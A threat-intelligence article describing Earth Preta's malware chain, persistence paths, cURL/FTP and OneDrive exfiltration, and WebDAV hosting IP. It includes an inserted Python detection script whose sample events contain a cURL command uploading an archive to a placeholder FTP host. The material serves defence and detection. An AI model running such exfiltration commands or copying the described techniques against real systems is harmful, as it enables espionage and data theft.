How Is Earth Preta Evolving Its Cyber-Espionage Tactics Rapidly?

The Earth Preta Advanced Persistent Threat (APT) group, recognized by various names such as Mustang Panda, Bronze President, RedDelta, and Red Lich, has been a prominent player in the realm of cyber-espionage since at least 2012. Primarily targeting government entities, academic institutions, foundations, and research sectors in the Asia-Pacific region, Earth Preta’s operational sophistication has continually evolved, reflecting their formidable capabilities.

A Shift from Classic Spear-Phishing to Advanced Malware Deployment

Historically reliant on spear-phishing, Earth Preta has transitioned to more elaborate strategies built around sophisticated malware deployment. The incorporation of a variant of the HIUPAN worm into its toolkit is a significant milestone: the worm spreads PUBLOAD via removable drives, giving the group the means to execute a wide range of tasks on compromised systems. The significance of PUBLOAD lies not only in its role in data gathering but also in its ability to exfiltrate data to FTP sites using the cURL tool. This evolution underscores the group’s shift towards more covert and efficient techniques.

Supplementing this, Earth Preta employs additional tools to enhance their capabilities. FDMTP, which leverages TouchSocket over DMTP, functions as a secondary control tool and downloader, while PTSOCKET offers an alternative route for data exfiltration. These enhancements showcase a marked improvement in their operational agility and complexity. The meticulous selection and deployment of these tools indicate Earth Preta’s readiness to adapt and integrate innovative technologies, making their cyber attack campaigns more unpredictable and sophisticated.

Persistent Malware and Multi-Stage Attacks

For persistence, the HIUPAN worm installs itself and PUBLOAD within the C:\ProgramData\Intel_ directory. This installation process includes the creation of autorun registry entries, ensuring the malware remains active even after system reboots. By strategically placing PUBLOAD in C:\ProgramData\CocCocBrowser, the attackers can conduct network surveillance and execute critical system commands such as ‘ipconfig’, ‘netstat’, and ‘systeminfo’. This meticulous setup exemplifies Earth Preta’s commitment to maintaining a foothold in compromised systems, thereby enhancing their ability to continuously monitor and control their target environments.
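A defender-side check for the persistence and exfiltration behaviour described in the two sections above (the staging directories, the autorun entries, the recon commands, and cURL uploads to FTP). This is an added example, not code from the original article or from the research it summarises; the event shape, file names and FTP host are constructed placeholders.

```python
import re

# Directories and commands taken from the article; everything else here is constructed.
STAGING_DIRS = (r"c:\programdata\intel_", r"c:\programdata\coccocbrowser")
RECON_CMDS = ("ipconfig", "netstat", "systeminfo")
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
FTP_URL_RE = re.compile(r"\bftps?://", re.I)

# Constructed sample telemetry in a Sysmon-like shape (id 1 = process creation,
# id 13 = registry value set). File names and the FTP host are placeholders, not IoCs.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all",
     "parent": r"C:\ProgramData\CocCocBrowser\sideloaded_host.exe"},
    {"id": 1, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -T C:\ProgramData\CocCocBrowser\out.rar ftp://ftp.example.invalid/up/",
     "parent": r"C:\ProgramData\CocCocBrowser\sideloaded_host.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Intel",
     "details": r"C:\ProgramData\Intel_\loader_placeholder.exe"},
    {"id": 1, "image": r"C:\Windows\System32\ipconfig.exe", "cmdline": "ipconfig /all",
     "parent": r"C:\Windows\System32\cmd.exe"},  # benign admin use: must not alert
]

def in_staging_dir(path):
    """True if path is one of the article's staging directories or sits beneath one."""
    p = path.strip('"').lower()
    return any(p == d or p.startswith(d + "\\") for d in STAGING_DIRS)

def classify(ev):
    """Return the names of the rules an event matches; an empty list means no alert."""
    hits = []
    if ev["id"] == 1:
        tokens = ev["cmdline"].split()
        base = re.sub(r"^.*\\", "", tokens[0].strip('"')).lower().removesuffix(".exe") if tokens else ""
        # Recon commands are normal from an admin shell, suspicious from the staging directory.
        if base in RECON_CMDS and (in_staging_dir(ev["parent"]) or in_staging_dir(ev["image"])):
            hits.append("recon_from_staging_dir")
        # PUBLOAD's exfiltration path as described: cURL talking to an FTP endpoint.
        if ev["image"].lower().endswith("\\curl.exe") and FTP_URL_RE.search(ev["cmdline"]):
            hits.append("curl_ftp_exfil")
    elif ev["id"] == 13 and RUN_KEY_RE.search(ev["target"]) and in_staging_dir(ev["details"]):
        hits.append("autorun_persistence")
    return hits

def detect(events):
    """Run every rule over a list of events; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]
```

Feeding real Sysmon events in requires only mapping EventID 1 and 13 fields onto the keys used here; the benign last event shows why parent/image context, not the command name alone, is the signal.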

The attackers exhibit particular interest in files with extensions such as .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx. The deliberate selection of these file types points to their strategic objective of extracting valuable and sensitive information. The convergence of multi-stage attacks and targeted data theft techniques indicates an enhanced level of sophistication and precision in their operations. These attacks are not only highly orchestrated but also meticulously executed, reflecting the group’s substantial investment in both resources and expertise to ensure their success.

The Evolution of Initial Compromise Methods

Earth Preta’s operations typically begin with a spear-phishing email that includes a .url attachment. This attachment initiates a multi-stage process, starting with the execution of a signed downloader tool named “DOWNBAIT.” DOWNBAIT uses multi-layered XOR encryption to download a decoy document alongside PULLBAIT, a shellcode component. The sophistication of this method lies in PULLBAIT’s ability to download and execute CBROVER through DLL side-loading. CBROVER serves as the initial backdoor stage, paving the way for the deployment of PLUGX, a more advanced malware. This multi-stage approach underscores their intricate planning and technical prowess in penetrating target systems.

PLUGX, employed in a two-stage process, is safeguarded by RC4 encryption and the Data Protection API (DPAPI). This progressive deployment design demonstrates Earth Preta’s strategic emphasis on penetrating targets deeply and maintaining control over compromised environments. These advanced methods not only improve their chances of successful infiltration but also make detection and removal considerably more challenging for cybersecurity defenses, thus extending the lifecycle of their attacks.

Sophisticated Data Collection and Exfiltration Techniques

For data gathering, Earth Preta makes use of the RAR command-line tool or FILESAC, essentially a modified “FileSearchAndCompress” utility. These tools are finely tuned to extract specific file types within designated date ranges, optimizing the value of stolen data. The collected data is exfiltrated using Microsoft’s cloud services, such as OneDrive and Graph API, reflecting an advanced understanding of modern data handling platforms. This method provides a sophisticated and efficient means of transferring stolen data, enhancing their ability to operate discreetly under the radar of conventional security measures.

The use of a WebDAV server at IP address 16.162.188.93 to host malware and decoy documents forms the backbone of their operations. This infrastructure supports their evasion techniques, operational speed, and multi-stage attack processes, illustrating the depth of their tactical evolution. By leveraging such robust infrastructure, Earth Preta ensures they remain a resilient and formidable threat capable of performing high-stakes cyber espionage operations.

Conclusion

The Earth Preta Advanced Persistent Threat (APT) group, also known by various aliases such as Mustang Panda, Bronze President, RedDelta, and Red Lich, has been a significant force in cybersecurity threats since at least 2012. This group has a well-established reputation for engaging in cyber-espionage activities, focusing its attacks on a range of entities. Its primary targets include government agencies, academic institutions, foundations, and research sectors, mainly within the Asia-Pacific region. The operational sophistication of Earth Preta has steadily evolved over the years, showcasing their formidable capabilities and making them a persistent threat in the digital landscape.

Their tactics, techniques, and procedures have continually adapted to bypass security measures, incorporating advanced malware, phishing schemes, and exploiting zero-day vulnerabilities. The group’s dedication to their craft and their ability to adapt to new defense mechanisms underscore their status as a potent adversary in the cyber-espionage arena. Information security professionals must remain vigilant against such threats, understanding that Earth Preta’s activities represent a persistent and evolving risk to their targets.
